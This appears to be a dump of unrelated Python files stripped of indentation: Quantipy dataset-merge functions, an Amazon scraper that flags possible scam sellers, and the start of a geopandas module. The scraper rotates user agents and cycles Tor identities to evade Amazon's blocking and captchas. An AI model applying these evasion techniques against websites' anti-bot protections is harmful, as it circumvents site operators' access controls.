left_column['text'] = merge_text_meta(
left_column['text'],
right_column['text'],
overwrite=overwrite)
if 'values' in left_column and 'values' in right_column:
left_column['values'] = merge_values_meta(
left_column['values'],
right_column['values'],
overwrite=overwrite)
return left_column
def _compatible_types(left_column, right_column):
l_type = left_column['type']
r_type = right_column['type']
if l_type == r_type: return None
all_types = ['array', 'int', 'float', 'single', 'delimited set', 'string',
'date', 'time', 'boolean']
err = {
'array': all_types,
'int': [
'float', 'delimited set', 'string', 'date', 'time', 'array'],
'float': [
'delimited set', 'string', 'date', 'time', 'array'],
'single': all_types,
'delimited set': [
'string', 'date', 'time', 'array', 'int', 'float'],
'string': [
'int', 'float', 'single', 'delimited set', 'date', 'time', 'array'],
'date': [
'int', 'float', 'single', 'delimited set', 'string', 'time', 'array'],
'time': [
'int', 'float', 'single', 'delimited set', 'string', 'time', 'array'],
}
warn = {
'int': [
'single'],
'float': [
'int', 'single'],
'delimited set': [
'single'],
'string': [
'boolean']
}
if r_type in err.get(l_type, all_types):
msg = "\n'{}': Trying to merge incompatibe types: Found '{}' in left "
msg += "and '{}' in right dataset."
raise TypeError(msg.format(left_column['name'], l_type, r_type))
elif r_type in warn.get(l_type, all_types):
msg = "\n'{}': Merge inconsistent types: Found '{}' in left "
msg += "and '{}' in right dataset."
warnings.warn(msg.format(left_column['name'], l_type, r_type))
else:
msg = "\n'{}': Found '{}' in left and '{}' in right dataset."
raise TypeError(msg.format(left_column['name'], l_type, r_type))
def _update_mask_meta(left_meta, right_meta, masks, verbose, overwrite=False):
"""
"""
# update mask
if not isinstance(masks, list): masks = [masks]
for mask in masks:
old = left_meta['masks'][mask]
new = right_meta['masks'][mask]
for tk, t in new['text'].items():
if not tk in old['text'] or overwrite:
old['text'].update({tk: t})
for item in new['items']:
check_source = item['source']
check = 0
for old_item in old['items']:
if old_item['source'] == check_source:
check = 1
try:
for tk, t in item['text'].items():
if not tk in old_item['text'] or overwrite:
old_item['text'].update({tk: t})
except:
if verbose:
e = "'text' meta not valid for mask {}: item {}"
e = e.format(mask, item['source'].split('@')[-1])
print '{} - skipped!'.format(e)
else:
pass
if check == 0:
old['items'].append(item)
# also add these items to ``meta['sets']``
left_meta['sets'][mask]['items'].append(item['source'])
def merge_meta(meta_left, meta_right, from_set, overwrite_text=False,
get_cols=False, get_updates=False, verbose=True):
if verbose:
print '\n', 'Merging meta...'
if from_set is None:
from_set = 'data file'
# Find the columns to be merged
if from_set in meta_right['sets']:
if verbose:
print ("New columns will be appended in the order found in"
" meta['sets']['{}'].".format(from_set))
cols = []
masks = []
mask_items = {}
for item in meta_right['sets'][from_set]['items']:
source, name = item.split('@')
if source == 'columns':
cols.append(name)
elif source == 'masks':
masks.append(name)
for item in meta_right['masks'][name]['items']:
s, n = item['source'].split('@')
if s == 'columns':
cols.append(n)
if meta_right['masks'][name].get('values'):
mask_items[n] = 'lib@values@{}'.format(name)
cols = uniquify_list(cols)
if masks:
for mask in masks:
if not mask in meta_left['masks']:
if verbose:
print "Adding meta['masks']['{}']".format(mask)
meta_left['masks'][mask] = meta_right['masks'][mask]
else:
_update_mask_meta(meta_left, meta_right, mask, verbose,
overwrite=overwrite_text)
sets = [key for key in meta_right['sets']
if not key in meta_left['sets']]
if sets:
for set_name in sorted(sets):
if verbose:
print "Adding meta['sets']['{}']".format(set_name)
meta_left['sets'][set_name] = meta_right['sets'][set_name]
for val in meta_right['lib']['values'].keys():
if not val in meta_left['lib']['values']:
if verbose:
print "Adding meta['lib']['values']['{}']".format(val)
meta_left['lib']['values'][val] = meta_right['lib']['values'][val]
elif val == 'ddf' or (meta_left['lib']['values'][val] ==
meta_right['lib']['values'][val]):
continue
else:
n_values = [v['value'] for v in meta_right['lib']['values'][val]]
o_values = [v['value'] for v in meta_left['lib']['values'][val]]
add_values = [v for v in n_values if v not in o_values]
if add_values:
for value in meta_right['lib']['values'][val]:
if value['value'] in add_values:
meta_left['lib']['values'][val].append(value)
else:
if verbose:
print (
"No '{}' set was found, new columns will be appended"
" alphanumerically.".format(from_set)
)
        cols = sorted(meta_right['columns'].keys(), key=str.lower)
col_updates = []
for col_name in cols:
if verbose:
print '...', col_name
# store properties
props = copy.deepcopy(
meta_right['columns'][col_name].get('properties', {}))
# emulate the right meta
right_column = emulate_meta(
meta_right,
meta_right['columns'][col_name])
if col_name in meta_left['columns'] and col_name in cols:
col_updates.append(col_name)
# emulate the left meta
left_column = emulate_meta(
meta_left,
meta_left['columns'][col_name])
            # merge the emulated metadata
meta_left['columns'][col_name] = merge_column_metadata(
left_column,
right_column,
overwrite=overwrite_text)
else:
# add metadata
if right_column.get('properties'):
right_column['properties']['merged'] = True
else:
right_column['properties'] = {'merged': True}
meta_left['columns'][col_name] = right_column
if 'properties' in meta_left['columns'][col_name]:
meta_left['columns'][col_name]['properties'].update(props)
if col_name in mask_items:
meta_left['columns'][col_name]['values'] = mask_items[col_name]
for item in meta_right['sets'][from_set]['items']:
if not item in meta_left['sets']['data file']['items']:
meta_left['sets']['data file']['items'].append(item)
if get_cols and get_updates:
return meta_left, cols, col_updates
elif get_cols:
return meta_left, cols
elif get_updates:
return meta_left, col_updates
else:
return meta_left
def get_columns_from_mask(meta, mask_name):
"""
Recursively retrieve the columns indicated by the named mask.
"""
cols = []
for item in meta['masks'][mask_name]['items']:
source, name = item['source'].split('@')
if source=='columns':
cols.append(name)
elif source=='masks':
cols.extend(get_columns_from_mask(meta, name))
elif source=='sets':
cols.extend(get_columns_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return cols
def get_columns_from_set(meta, set_name):
"""
Recursively retrieve the columns indicated by the named set.
"""
cols = []
for item in meta['sets'][set_name]['items']:
source, name = item.split('@')
if source=='columns':
cols.append(name)
elif source=='masks':
cols.extend(get_columns_from_mask(meta, name))
elif source=='sets':
cols.extend(get_columns_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
cols = qp.core.tools.dp.query.uniquify_list(cols)
return cols
def get_masks_from_mask(meta, mask_name):
"""
Recursively retrieve the masks indicated by the named mask.
"""
masks = []
for item in meta['masks'][mask_name]['items']:
source, name = item['source'].split('@')
if source=='masks':
masks.append(name)
elif source=='columns':
pass
elif source=='sets':
masks.extend(get_masks_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return masks
def get_masks_from_set(meta, set_name):
"""
Recursively retrieve the masks indicated by the named set.
"""
masks = []
for item in meta['sets'][set_name]['items']:
source, name = item.split('@')
if source=='masks':
masks.append(name)
elif source=='columns':
pass
elif source=='sets':
            masks.extend(get_masks_from_set(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return masks
def get_sets_from_mask(meta, mask_name):
"""
Recursively retrieve the sets indicated by the named mask.
"""
sets = []
for item in meta['masks'][mask_name]['items']:
source, name = item['source'].split('@')
if source=='sets':
sets.append(name)
elif source=='columns':
pass
elif source=='masks':
sets.extend(get_sets_from_mask(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return sets
def get_sets_from_set(meta, set_name):
"""
Recursively retrieve the sets indicated by the named set.
"""
sets = []
for item in meta['sets'][set_name]['items']:
source, name = item.split('@')
if source=='sets':
sets.append(name)
elif source=='columns':
pass
elif source=='masks':
sets.extend(get_sets_from_mask(meta, name))
else:
raise KeyError(
"Unsupported meta-mapping: {}".format(item))
return sets
def hmerge(dataset_left, dataset_right, on=None, left_on=None, right_on=None,
overwrite_text=False, from_set=None, merge_existing=None, verbose=True):
"""
    Merge Quantipy datasets together using an index-wise identifier.
This function merges two Quantipy datasets (meta and data) together,
updating variables that exist in the left dataset and appending
others. New variables will be appended in the order indicated by
the 'data file' set if found, otherwise they will be appended in
    alphanumeric order. This merge happens horizontally (column-wise).
    The underlying pandas.DataFrame.merge() call is always performed
    with how='left'.
Parameters
----------
dataset_left : tuple
A tuple of the left dataset in the form (meta, data).
dataset_right : tuple
A tuple of the right dataset in the form (meta, data).
on : str, default=None
The column to use as a join key for both datasets.
left_on : str, default=None
The column to use as a join key for the left dataset.
right_on : str, default=None
The column to use as a join key for the right dataset.
overwrite_text : bool, default=False
If True, text_keys in the left meta that also exist in right
meta will be overwritten instead of ignored.
from_set : str, default=None
Use a set defined in the right meta to control which columns are
merged from the right dataset.
merge_existing : str/ list of str, default None, {'all', [var_names]}
Specify if codes should be merged for delimited sets for defined
variables.
verbose : bool, default=True
Echo progress feedback to the output pane.
Returns
-------
meta, data : dict, pandas.DataFrame
Updated Quantipy dataset.
"""
def _merge_delimited_sets(x):
codes = []
x = str(x).replace('nan', '')
for c in x.split(';'):
if not c:
continue
if not c in codes:
codes.append(c)
if not codes:
return np.NaN
else:
return ';'.join(sorted(codes)) + ';'
if all([kwarg is None for kwarg in [on, left_on, right_on]]):
raise TypeError("You must provide a column name for either 'on' or "
"both 'left_on' AND 'right_on'")
elif not on is None and not (left_on is None and right_on is None):
raise ValueError("You cannot provide a value for both 'on' and either/"
"both 'left_on'/'right_on'.")
elif on is None and (left_on is None or right_on is None):
raise TypeError("You must provide a column name for both 'left_on' "
"AND 'right_on'")
elif not on is None:
left_on = on
right_on = on
meta_left = copy.deepcopy(dataset_left[0])
data_left = dataset_left[1].copy()
if isinstance(dataset_right, tuple): dataset_right = [dataset_right]
for ds_right in dataset_right:
meta_right = copy.deepcopy(ds_right[0])
data_right = ds_right[1].copy()
slicer = data_right[right_on].isin(data_left[left_on].values.tolist())
data_right = data_right.loc[slicer, :]
if verbose:
print '\n', 'Checking metadata...'
if from_set is None:
from_set = 'data file'
# Merge the right meta into the left meta
meta_left, cols, col_updates = merge_meta(meta_left, meta_right,
from_set, overwrite_text,
True, True, verbose)
# col_updates exception when left_on==right_on
        if left_on==right_on and left_on in col_updates:
            col_updates.remove(left_on)
if not left_on==right_on and right_on in col_updates:
update_right_on = True
else:
update_right_on = False
if verbose:
print '\n', 'Merging data...'
# update columns which are in left and in right data
if col_updates:
updata_left = data_left.copy()
updata_left['org_idx'] = updata_left.index.tolist()
updata_left = updata_left.set_index([left_on])[col_updates+['org_idx']]
updata_right = data_right.set_index(
right_on, drop=not update_right_on)[col_updates].copy()
sets = [c for c in col_updates
if meta_left['columns'][c]['type'] == 'delimited set']
non_sets = [c for c in col_updates if not c in sets]
if verbose:
print '------ updating data for known columns'
updata_left.update(updata_right[non_sets])
if merge_existing:
for col in sets:
if not (merge_existing == 'all' or col in merge_existing):
continue
if verbose:
print "..{}".format(col)
updata_left[col] = updata_left[col].combine(
updata_right[col],
lambda x, y: _merge_delimited_sets(str(x)+str(y)))
updata_left.reset_index(inplace=True)
for col in col_updates:
data_left[col] = updata_left[col].astype(data_left[col].dtype)
# append completely new columns
if verbose:
print '------ appending new columns'
new_cols = [col for col in cols if not col in col_updates]
if update_right_on:
new_cols.append(right_on)
kwargs = {'left_on': left_on,
'right_on': right_on,
'how': 'left'}
data_left = data_left.merge(data_right[new_cols], **kwargs)
if update_right_on:
new_cols.remove(right_on)
_x = "{}_x".format(right_on)
_y = "{}_y".format(right_on)
data_left.rename(columns={_x: right_on}, inplace=True)
data_left.drop(_y, axis=1, inplace=True)
if verbose:
for col_name in new_cols:
print '..{}'.format(col_name)
print '\n'
return meta_left, data_left
def vmerge(dataset_left=None, dataset_right=None, datasets=None,
on=None, left_on=None, right_on=None,
row_id_name=None, left_id=None, right_id=None, row_ids=None,
overwrite_text=False, from_set=None, reset_index=True,
verbose=True):
"""
Merge Quantipy datasets together by appending rows.
This function merges two Quantipy datasets (meta and data) together,
updating variables that exist in the left dataset and appending
others. New variables will be appended in the order indicated by
the 'data file' set if found, otherwise they will be appended in
alphanumeric order. This merge happens vertically (row-wise).
Parameters
----------
dataset_left : tuple, default=None
A tuple of the left dataset in the form (meta, data).
dataset_right : tuple, default=None
A tuple of the right dataset in the form (meta, data).
datasets : list, default=None
A list of datasets that will be iteratively sent into vmerge
in pairs.
on : str, default=None
The column to use to identify unique rows in both datasets.
    left_on : str, default=None
        The column to use to identify unique rows in the left dataset.
    right_on : str, default=None
        The column to use to identify unique rows in the right dataset.
row_id_name : str, default=None
The named column will be filled with the ids indicated for each
dataset, as per left_id/right_id/row_ids. If meta for the named
column doesn't already exist a new column definition will be
added and assigned a reductive-appropriate type.
left_id : str/int/float, default=None
Where the row_id_name column is not already populated for the
dataset_left, this value will be populated.
right_id : str/int/float, default=None
Where the row_id_name column is not already populated for the
dataset_right, this value will be populated.
row_ids : list of str/int/float, default=None
When datasets has been used, this list provides the row ids
that will be populated in the row_id_name column for each of
those datasets, respectively.
overwrite_text : bool, default=False
If True, text_keys in the left meta that also exist in right
meta will be overwritten instead of ignored.
from_set : str, default=None
Use a set defined in the right meta to control which columns are
merged from the right dataset.
reset_index : bool, default=True
        If True, pandas.DataFrame.reset_index(drop=True) will be applied
        to the merged dataframe.
verbose : bool, default=True
Echo progress feedback to the output pane.
Returns
-------
meta, data : dict, pandas.DataFrame
Updated Quantipy dataset.
"""
if from_set is None:
from_set = 'data file'
if not datasets is None:
if not isinstance(datasets, list):
raise TypeError(
"'datasets' must be a list.")
        if len(datasets) < 2:
            raise ValueError(
                "'datasets' must be a list of at least two datasets.")
for dataset in datasets:
if not isinstance(dataset, tuple):
raise TypeError(
"The datasets in 'datasets' must be tuples.")
if not len(dataset)==2:
raise ValueError(
"The datasets in 'datasets' must be tuples with a"
" size of 2 (meta, data).")
dataset_left = datasets[0]
if row_ids:
left_id = row_ids[0]
for i in range(1, len(datasets)):
dataset_right = datasets[i]
if row_ids:
right_id = row_ids[i]
meta_vm, data_vm = vmerge(
dataset_left, dataset_right,
on=on, left_on=left_on, right_on=right_on,
row_id_name=row_id_name, left_id=left_id, right_id=right_id,
overwrite_text=overwrite_text, from_set=from_set,
reset_index=reset_index,
verbose=verbose)
dataset_left = (meta_vm, data_vm)
return meta_vm, data_vm
if on is None and left_on is None and right_on is None:
blind_append = True
else:
blind_append = False
if on is None:
if left_on is None or right_on is None:
raise ValueError(
"You may not provide a value for only one of"
"'left_on'/'right_on'.")
else:
if not left_on is None or not right_on is None:
raise ValueError(
"You cannot provide a value for both 'on' and either/"
"both 'left_on'/'right_on'.")
left_on = on
right_on = on
meta_left = cpickle_copy(dataset_left[0])
data_left = dataset_left[1].copy()
if not blind_append:
if not left_on in data_left.columns:
raise KeyError(
"'{}' not found in the left data.".format(left_on))
if not left_on in meta_left['columns']:
raise KeyError(
"'{}' not found in the left meta.".format(left_on))
meta_right = cpickle_copy(dataset_right[0])
data_right = dataset_right[1].copy()
if not blind_append:
        if not right_on in data_right.columns:
            raise KeyError(
                "'{}' not found in the right data.".format(right_on))
        if not right_on in meta_right['columns']:
            raise KeyError(
                "'{}' not found in the right meta.".format(right_on))
if not row_id_name is None:
if left_id is None and right_id is None:
raise TypeError(
"When indicating a 'row_id_name' you must also"
" provide either 'left_id' or 'right_id'.")
if row_id_name in meta_left['columns']:
pass
# text_key_right = meta_right['lib']['default text']
# meta_left['columns'][row_id_name]['text'].update({
# text_key_right: 'vmerge row id'})
else:
left_id_int = isinstance(left_id, (int, np.int64))
right_id_int = isinstance(right_id, (int, np.int64))
if left_id_int and right_id_int:
id_type = 'int'
else:
left_id_float = isinstance(left_id, (float, np.float64))
right_id_float = isinstance(right_id, (float, np.float64))
if (left_id_int or left_id_float) and (right_id_int or right_id_float):
id_type = 'float'
left_id = float(left_id)
right_id = float(right_id)
else:
id_type = 'str'
left_id = str(left_id)
right_id = str(right_id)
if verbose:
print (
"'{}' was not found in the left meta so a new"
" column definition will be created for it. Based"
" on the given 'left_id' and 'right_id' types this"
" new column will be given the type '{}'.".format(
row_id_name,
id_type))
text_key_left = meta_left['lib']['default text']
text_key_right = meta_right['lib']['default text']
meta_left['columns'][row_id_name] = {
'name': row_id_name,
'type': id_type,
'text': {
text_key_left: 'vmerge row id',
text_key_right: 'vmerge row id'}}
id_mapper = "columns@{}".<EMAIL>(row_id_name)
if not id_mapper in meta_left['sets']['data file']['items']:
meta_left['sets']['data file']['items'].append(id_mapper)
# Add the left and right id values
if not left_id is None:
if row_id_name in data_left.columns:
left_id_rows = data_left[row_id_name].isnull()
            data_left.loc[left_id_rows, row_id_name] = left_id
else:
data_left[row_id_name] = left_id
if not right_id is None:
data_right[row_id_name] = right_id
if verbose:
print '\n', 'Checking metadata...'
# Merge the right meta into the left meta
meta_left, cols, col_updates = merge_meta(
meta_left, meta_right,
from_set=from_set,
overwrite_text=overwrite_text,
get_cols=True,
get_updates=True,
verbose=verbose)
if not blind_append:
        vmerge_slicer = data_right[right_on].isin(data_left[left_on])
data_right = data_right.loc[~vmerge_slicer]
# convert right cols to delimited set if depending left col is delimited set
for col in data_right.columns.tolist():
if (meta_left['columns'].get(col, {}).get('type') == 'delimited set'
and not meta_right['columns'][col]['type'] == 'delimited set'):
data_right[col] = data_right[col].apply(
lambda x: str(int(x)) + ';' if not np.isnan(x) else np.NaN)
vdata = pd.concat([
data_left,
data_right
])
# Determine columns that should remain in the merged data
cols_left = data_left.columns.tolist()
col_slicer = cols_left + [
col for col in get_columns_from_set(meta_right, from_set)
if not col in cols_left]
vdata = vdata[col_slicer]
if reset_index:
vdata.reset_index(drop=True, inplace=True)
if verbose:
print '\n'
return meta_left, vdata
def subset_dataset(meta, data, columns):
"""
Get a subset of the given meta
"""
sdata = data[columns].copy()
smeta = start_meta(text_key=meta['lib']['default text'])
for col in columns:
smeta['columns'][col] = meta['columns'][col]
for col_mapper in meta['sets']['data file']['items']:
if col_mapper.split('@')[-1] in columns:
smeta['sets']['data file']['items'].append(col_mapper)
return smeta, sdata
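# --- Usage sketch (added for illustration; not part of the original module).
# Builds a tiny two-column dataset and keeps only 'age'.
if __name__ == '__main__':
    demo_meta = start_meta()
    demo_meta['columns']['age'] = create_column('age', 'int')
    demo_meta['columns']['gender'] = create_column('gender', 'single')
    demo_meta['sets']['data file']['items'] = ['columns@age', 'columns@gender']
    demo_data = pd.DataFrame({'age': [23, 42], 'gender': [1, 2]})
    smeta, sdata = subset_dataset(demo_meta, demo_data, ['age'])
    assert list(sdata.columns) == ['age']
    assert smeta['sets']['data file']['items'] == ['columns@age']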
|
1698204
|
import sys
import urllib3
import certifi
import re
import os
import random
import time
from json import loads
import socket
from urllib3.contrib.socks import SOCKSProxyManager
from bs4 import BeautifulSoup
from tqdm import tqdm
import asyncio
import aiohttp
import sqlite3
# setup colored output
from colorama import init
init(autoreset=True)
from colorama import Fore, Back, Style
print (Fore.YELLOW + """
888888 888 .d8888b.
"88b 888 d88P Y88b
888 888 Y88b.
888 888 888 88888b. .d88b. 888 .d88b. "Y888b. .d8888b 8888b. 88888b.d88b.
888 888 888 888 "88b d88P"88b 888 d8P Y8b "Y88b. d88P" "88b 888 "888 "88b
888 888 888 888 888 888 888 888 88888888 "888 888 .d888888 888 888 888
88P Y88b 888 888 888 Y88b 888 888 Y8b. Y88b d88P Y88b. 888 888 888 888 888
888 "Y88888 888 888 "Y88888 888 "Y8888 "Y8888P" "Y8888P "Y888888 888 888 888
.d88P 888
.d88P" Y8b d88P
888P" "Y88P"
""")
print(Fore.CYAN + 'An Amazon OSINT scraper for potential scam accounts')
print(Fore.YELLOW + 'By @jakecreps & @noneprivacy')
print(Fore.CYAN + 'Insert your keyword')
baseUrl = 'https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Daps&field-keywords=' + input()
print(Fore.CYAN + 'Which pages do you want to scan? (eg: 1-5)')
pages = input().split('-')
print(Fore.CYAN + 'Maximum Seller Feedback (%)')
threshold = input()
print(Fore.CYAN + 'What do you want to call the database? (if it does not exist, a new one will be created)')
dbName = input() + ".db"
print(Fore.CYAN + 'Use Tor to round-robin requests? (Y/N)')
torSupport = input()
if torSupport.lower() == "y":
torSupport = True
else:
torSupport = False
_products_id = {}
_sellers_id = {}
rmScores = {
'3': 'Fail',
'2': 'Warn',
'1': 'Pass',
'0': 'Zero'
}
roundRobin = 0
torPort = '9050' # 9150 if using Tor Browser
torControlPort = 9051 # 9151 if using Tor Browser
torControlPW = 'password' # generate the hash with `tor --hash-password "password"`
# and add the result to your torrc, e.g.:
# HashedControlPassword 16:<PASSWORD>
# don't do this if you don't know what you are doing
def initDB(db):
dbConnector = sqlite3.connect(db)
cursor = dbConnector.cursor()
tableProducts = """
CREATE TABLE IF NOT EXISTS
products (
id TEXT PRIMARY KEY NOT NULL,
rm_score TEXT
);
"""
cursor.execute(tableProducts)
tableSellers = """
CREATE TABLE IF NOT EXISTS
sellers (
id TEXT PRIMARY KEY NOT NULL,
name TEXT NOT NULL,
JL INTEGER,
        feedback INTEGER
);
"""
cursor.execute(tableSellers)
tableDesc = """
CREATE TABLE IF NOT EXISTS
extras (
id TEXT NOT NULL,
contact INTEGER,
gmail INTEGER,
yahoo INTEGER,
paypal INTEGER,
FOREIGN KEY(id) REFERENCES sellers(id)
);
"""
cursor.execute(tableDesc)
tableWhoSellsWhat = """
CREATE TABLE IF NOT EXISTS
wsw (
product_id TEXT NOT NULL,
seller_id TEXT NOT NULL,
FOREIGN KEY(product_id) REFERENCES products(id),
FOREIGN KEY(seller_id) REFERENCES sellers(id)
);
"""
cursor.execute(tableWhoSellsWhat)
return dbConnector
dbConnector = initDB(dbName)
def insertProduct(productID, rmScore):
try:
cursor = dbConnector.cursor()
cursor.execute('INSERT INTO products VALUES(?,?)', (productID, rmScore))
dbConnector.commit()
except sqlite3.IntegrityError:
pass
def insertSeller(productID, sellerInfo):
try:
cursor = dbConnector.cursor()
cursor.execute('INSERT INTO wsw VALUES(?,?)', (productID, sellerInfo[0]))
dbConnector.commit()
except sqlite3.IntegrityError:
pass
try:
cursor.execute('INSERT INTO sellers VALUES(?,?,?,?)', sellerInfo)
dbConnector.commit()
except sqlite3.IntegrityError:
pass
def insertExtra(sellerID, extras):
_contact = ('contact' in extras)*1
_gmail = ('gmail' in extras)*1
_yahoo = ('yahoo' in extras)*1
_paypal = ('paypal' in extras)*1
_extras = (sellerID, _contact, _gmail, _yahoo, _paypal)
try:
cursor = dbConnector.cursor()
cursor.execute('INSERT INTO extras VALUES(?,?,?,?,?)', _extras)
dbConnector.commit()
except sqlite3.IntegrityError:
pass
def getInsertedSellers():
cursor = dbConnector.cursor()
cursor.execute('SELECT * FROM wsw')
allRows = cursor.fetchall()
with tqdm(total=len(allRows), desc='[<] Retrieving stored sellers') as cursorBar:
for row in allRows:
_sellers_id[row[1]] = {row[0] : True}
cursorBar.update(1)
cursorBar.close()
def newTorIdentity():
tor_c = socket.create_connection(('127.0.0.1', torControlPort))
tor_c.send('AUTHENTICATE "{}"\r\nSIGNAL NEWNYM\r\n'.format(torControlPW).encode())
response = tor_c.recv(1024)
if response == b'250 OK\r\n250 OK\r\n':
print('[+] new Tor identity')
def getRandomUA():
_httpPool = urllib3.PoolManager( 1,
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where())
url = "https://fake-useragent.herokuapp.com/browsers/0.1.8"
r = _httpPool.request('GET', url).data.decode('utf-8')
browsers = loads(r)['browsers']
return browsers
browsers = getRandomUA()
def randomUserAgent():
return random.choice(browsers[random.choice(list(browsers))])
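# pageRequest below alternates between a direct connection and the Tor SOCKS
# proxy (when Tor support is enabled) on every other request, and asks the Tor
# control port for a fresh circuit every 60 requests to spread traffic across
# exit nodes.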
def pageRequest(url):
global roundRobin
proxy = SOCKSProxyManager('socks5://localhost:'+str(torPort),
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where(),
headers={'user-agent': randomUserAgent(), 'Cookie': ''})
http = urllib3.PoolManager( 1,
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where(),
headers={'user-agent': randomUserAgent(), 'Cookie': ''})
if roundRobin % 2:
response = http.request('GET', url)
else:
if torSupport:
response = proxy.request('GET', url)
else:
response = http.request('GET', url)
roundRobin += 1
    if torSupport and not roundRobin % 60:
        newTorIdentity()  # only talk to the Tor control port when Tor is in use
return response.data
def reviewMetaScore(itemID):
url = f'https://reviewmeta.com/api/amazon/{itemID}'
response = pageRequest(url)
return response
async def asyncRequest(url):
timeout = aiohttp.ClientTimeout(total=60*3)
ua = {'user-agent': randomUserAgent(), 'Cookie': ''}
async with aiohttp.ClientSession(headers=ua) as session:
try:
async with await session.get(url, timeout=timeout) as response:
return await response.read()
except aiohttp.client_exceptions.ClientConnectorError:
print(Fore.RED + "\n[x] Error while fetching data from Amazon!")
def productIdsExtractor(soup):
global _products_id
    for link in soup.find_all('a', href=re.compile(r'/dp/[\w]{2,20}/ref=sr_1_[\d]{1,3}')):
l = link.get('href')
_l = l.split('/')
try:
a = _products_id[_l[5]]
except KeyError:
_products_id.update({_l[5]: l})
return _products_id
def sellerListExtractor(sellerListLink, sbar):
divs = []
while True:
_htmlContent = pageRequest(sellerListLink)
_soup = BeautifulSoup(_htmlContent, 'lxml')
if _soup:
try:
_t = _soup.find('title').text
if _t == 'Sorry! Something went wrong!':
                    if torSupport:
                        newTorIdentity()
sbar.write(sellerListLink)
sbar.write('[x] {}'.format(_t))
sbar.write('[*] waiting 10 sec...')
time.sleep(10)
else:
_divs = _soup.find_all('div', attrs = {'class': 'a-row a-spacing-mini olpOffer'})
for _d in _divs:
divs.append(_d)
sellerListLink = _soup.find('li', attrs = {'class': 'a-last'})
try:
a = sellerListLink.find('a')['href']
except Exception as e:
break
sellerListLink = site + sellerListLink.find('a')['href']
except AttributeError:
sbar.write("[x] can't find title, going to wait and retry")
sbar.write('[*] waiting 10 sec...')
time.sleep(10)
return divs
def sellerIdExtractor(link, sbar):
try:
_seller_id = link.split("seller=")[1]
return _seller_id
    except IndexError:
        sbar.write('[x] got a redirection to another website')
        return False
def sellerFeedbackExtractor(soup):
_out_of = soup.find_all('span', attrs = {'class': 'a-color-success'})
if _out_of:
try:
_feedback = list(_out_of)[len(_out_of) - 1].text
return _feedback
        except Exception:
print(Fore.RED + "\n[x] Error while getting feedback from seller" +
", please check manually the next result")
return '-1'
def sellerDescExtractor(soup):
about = soup.find('span', id='about-seller-text')
if about:
_text = about.text
_whatToFind = ['contact', 'gmail', 'yahoo', 'paypal']
_about = ""
for w in _whatToFind:
if w in _text:
_about += w + ','
        _about = _about[:-1]  # drop the trailing comma
return _about
return ''
def sellerJustLaunched(soup):
JL_bool = soup.find('span', id='feedback-no-rating')
if JL_bool:
return 'True'
return ''
async def extractSellerInfo(link, itemID, sbar):
sellerID = sellerIdExtractor(link, sbar)
if sellerID:
try:
_sID = _sellers_id[sellerID][itemID]
return {}
except KeyError:
_sellers_id[sellerID] = {itemID: True}
url = site + link
_htmlContent = pageRequest(url)
_soup = BeautifulSoup(_htmlContent, 'lxml')
JL_bool = sellerJustLaunched(_soup)
sellerFull = {
'id': sellerID,
'feedback': '',
'desc': '',
'just-launched': JL_bool
}
if not JL_bool:
sellerFull['feedback'] = sellerFeedbackExtractor(_soup)
if int(sellerFull['feedback']) > int(threshold):
return {}
sellerFull['desc'] = sellerDescExtractor(_soup)
return sellerFull
return {}
async def fetchSellersFull(itemID, sbar):
checkUrl = f"https://www.amazon.com/gp/offer-listing/{itemID}/ref=dp_olp_new_center?ie=UTF8"
rmScore = loads(reviewMetaScore(itemID))['s_overall']
while not rmScore:
sbar.write(Fore.YELLOW + '[x] item not scanned yet.\n' +
'Please open the next link in the browser, scan the product and press enter.')
sbar.write(f'https://reviewmeta.com/amazon/{itemID}')
sbar.write(Fore.YELLOW + '[!] if there aren\'t any reviews for this product, just type \"0\"')
_input = input('\n[>]')
if _input:
rmScore = '0'
else:
rmScore = loads(reviewMetaScore(itemID))['s_overall']
_rmScore = rmScores[rmScore]
insertProduct(itemID, _rmScore)
divs = sellerListExtractor(checkUrl, sbar)
for div in divs:
_name = div.find('h3', attrs = {'class': 'olpSellerName'})
name = _name.text.strip()
if name:
sellerLink = _name.find('a')['href']
sellerFull = await extractSellerInfo(sellerLink, itemID, sbar)
if sellerFull:
if not sellerFull['feedback'] == '-1':
sbar.write("<-> " + name + "\n |-> id: " + sellerFull['id']
+ "\n |-> just-launched: " + sellerFull['just-launched']
+ "\n |-> feedback: " + sellerFull['feedback']
+ "\n |-> desc: " + sellerFull['desc']
+ "\n --> Review Meta Score: " + _rmScore)
_t_JL = 0
if sellerFull['just-launched']:
_t_JL = 1
try:
_t_feedback = int(sellerFull['feedback'])
except ValueError:
_t_feedback = -2
_sellerFull = (sellerFull['id'], str(name), _t_JL, _t_feedback)
insertSeller(itemID, _sellerFull)
insertExtra(sellerFull['id'], sellerFull['desc'])
sbar.update(1)
site = "https://" + baseUrl.split('/')[2]
tasks = []
loop = asyncio.get_event_loop()
fPage = int(pages[0])
lPage = int(pages[1])
_tqdm_desc = "[<] Extracting ids from pages"
with tqdm(total=lPage, desc=_tqdm_desc) as pbar:
getInsertedSellers()
for i in range(lPage):
htmlContent = pageRequest(baseUrl)
soup = BeautifulSoup(htmlContent, 'lxml')
if soup.find('title').text == 'Robot Check':
pbar.write('[x] Captcha found, wait a while before retrying or change the IP!')
else:
nextPage = soup.find('a', attrs = {'id': 'pagnNextLink'})['href']
baseUrl = site + nextPage
        if i + 1 >= fPage:  # the user-entered page range is 1-indexed
IDs = productIdsExtractor(soup)
if not len(IDs):
pbar.write("[x] Amazon is blocking your requests, please change IP")
exit()
for key in IDs:
task = asyncio.ensure_future(fetchSellersFull(key, pbar))
tasks.append(task)
pbar.update(1)
pbar.clear()
pbar.set_description("[<] Extracting sellers info")
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
dbConnector.close()
|
1698250
|
import geopandas as gpd
import networkx as nx
import pandas as pd
import shapely
from shapely.ops import cascaded_union
from syspy.spatial import polygons, spatial
from syspy.syspy_utils import neighbors, pandas_utils, syscolors
from tqdm import tqdm
def compute_coverage_layer(layer, buffer, extensive_cols=[]):
"""
